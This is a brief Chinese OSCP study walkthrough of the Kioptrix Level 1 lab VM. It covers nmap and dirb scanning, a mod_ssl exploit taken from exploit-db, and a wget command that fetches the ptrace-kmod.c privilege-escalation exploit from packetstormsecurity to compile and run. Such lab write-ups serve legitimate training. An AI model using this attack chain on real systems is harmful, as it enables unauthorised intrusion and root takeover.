oscp学习之路,Kioptix Level1靶场小白速通教程
有意向学习oscp的可以私信我一起交流学习
1.前期准备
首先下载好靶场文件,通过nmap进行扫描,确定IP地址和开放端口
发现IP是192.168.201.129,开放的端口为22,80,111,139,443,1024这几个端口。访问IP地址未发现漏洞点,接着对目录进行扫描
dirb url
渗透环节
对页面进行访问,查找漏洞点
在扫描出来的文件路径中发现信息,发现时Apache 1.3.20版本,并且变相提示注意mod_ssl漏洞
利用工具 searchsploit 查找漏洞相关信息和exp相关信息。
确定脚本,到https://www.exploit-db.com/ 下载,搜索mod_ssl
对脚本进行下载编译,然后运行,
成功进入靶场但是还不是管理员权限,需要进行一次提权,提权的方式有很多,这里采用最简单的,直接下载提权脚本
wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
上传完以后成功编译,直接运行,查看权限,提权成功
